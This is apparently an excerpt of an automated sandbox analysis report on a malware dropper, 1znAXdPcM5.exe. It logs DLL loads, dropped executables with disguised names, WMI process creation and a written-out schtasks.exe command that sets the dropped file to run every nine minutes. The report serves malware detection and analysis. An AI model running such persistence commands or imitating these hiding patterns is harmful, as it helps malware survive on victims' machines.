                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winnsi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rasadhlp.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: edputil.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dwrite.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wbemcomn.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: amsi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: userenv.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winmm.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: winmmbase.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mmdevapi.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: devobj.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ksuser.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: avrt.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: audioses.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: powrprof.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: umpdc.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: msacm32.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: midimap.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windowscodecs.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ntmarta.dll
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: dpapi.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: mscoree.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: apphelp.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: version.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: uxtheme.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: windows.storage.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: wldp.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: profapi.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptsp.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: rsaenh.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: cryptbase.dll
                                    Source: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeSection loaded: sspicli.dll
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                                    Source: 1znAXdPcM5.exeStatic file information: File size 2236943 > 1048576
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: 1znAXdPcM5.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: 1znAXdPcM5.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 1znAXdPcM5.exe
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: 1znAXdPcM5.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeFile created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\__tmp_rar_sfx_access_check_7066140Jump to behavior
                                    Source: 1znAXdPcM5.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059F640 push ecx; ret 0_2_0059F653
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeCode function: 0_2_0059EB78 push eax; ret 0_2_0059EB96
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D5394 push ds; ret 5_2_00007FFD9B7D5397
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D4B4F pushad ; retf 5_2_00007FFD9B7D4B55
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B7D00AD pushad ; iretd 5_2_00007FFD9B7D00C1
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9B933033 push ebx; retn 0009h5_2_00007FFD9B933034
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBC62C5 push ebp; ret 5_2_00007FFD9BBC62C8
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCDF45 push edi; ret 5_2_00007FFD9BBCDF46
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBC7F4E push ss; ret 5_2_00007FFD9BBC7F5D
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCDE82 push esi; ret 5_2_00007FFD9BBCDE83
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCE52F push edi; ret 5_2_00007FFD9BBCE530
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 5_2_00007FFD9BBCE504 push eax; ret 5_2_00007FFD9BBCE505
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E7354 push es; retf 26_2_00007FFD9B7E7357
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E7206 push ss; retf 26_2_00007FFD9B7E7207
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E9207 push ebp; retf 26_2_00007FFD9B7E920A
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7E9A06 push esi; ret 26_2_00007FFD9B7E9A09
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B805B99 push E812B67Eh; ret 26_2_00007FFD9B805BA0
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D5394 push ds; ret 26_2_00007FFD9B7D5397
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D4B4F pushad ; retf 26_2_00007FFD9B7D4B55
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 26_2_00007FFD9B7D00AD pushad ; iretd 26_2_00007FFD9B7D00C1
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 27_2_00007FFD9B7C5394 push ds; ret 27_2_00007FFD9B7C5397
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 27_2_00007FFD9B7C4B4F pushad ; retf 27_2_00007FFD9B7C4B55
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeCode function: 27_2_00007FFD9B7C00AD pushad ; iretd 27_2_00007FFD9B7C00C1
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 29_2_00007FFD9B7E5394 push ds; ret 29_2_00007FFD9B7E5397
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 29_2_00007FFD9B7E4B4F pushad ; retf 29_2_00007FFD9B7E4B55
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 29_2_00007FFD9B7E00AD pushad ; iretd 29_2_00007FFD9B7E00C1
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D7353 push es; retf 31_2_00007FFD9B7D7357
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D9A06 push esi; ret 31_2_00007FFD9B7D9A09
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D7206 push ss; retf 31_2_00007FFD9B7D7207
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7D9207 push ebp; retf 31_2_00007FFD9B7D920A
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeCode function: 31_2_00007FFD9B7C5394 push ds; ret 31_2_00007FFD9B7C5397
                                    Source: Agentcomponentbrokermonitordhcp.exe.0.drStatic PE information: section name: .text entropy: 7.537640943300724
                                    Source: RuntimeBroker.exe.5.drStatic PE information: section name: .text entropy: 7.537640943300724
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe.5.drStatic PE information: section name: .text entropy: 7.537640943300724
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe0.5.drStatic PE information: section name: .text entropy: 7.537640943300724
                                    Source: aXnWbWpBWYJmkhPMHrrUNM.exe1.5.drStatic PE information: section name: .text entropy: 7.537640943300724

                                    Persistence and Installation Behavior

                                    barindex
                                    Creates processes via WMI
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\GoOOBNnj.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\XeElcNfe.logJump to dropped file
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeFile created: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Recovery\aXnWbWpBWYJmkhPMHrrUNM.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\IlqWXNCe.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\HBUOKBdR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\ToOuVQfl.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\ebskEcaT.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\QPyLHGSL.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\axSbriXt.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\GoOOBNnj.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\axSbriXt.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\QPyLHGSL.logJump to dropped file
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\user\Desktop\IlqWXNCe.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\HBUOKBdR.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\XeElcNfe.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\ebskEcaT.logJump to dropped file
                                    Source: C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exeFile created: C:\Users\user\Desktop\ToOuVQfl.logJump to dropped file

                                    Boot Survival

                                    barindex
                                    Drops PE files to the user root directory
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeFile created: C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exeJump to dropped file
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "aXnWbWpBWYJmkhPMHrrUNMa" /sc MINUTE /mo 9 /tr "'C:\Users\Default\aXnWbWpBWYJmkhPMHrrUNM.exe'" /f
                                    Source: C:\Users\user\Desktop\1znAXdPcM5.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\AppData\Roaming\Local\discord\surrogateWinMonitordll\Agentcomponentbrokermonitordhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
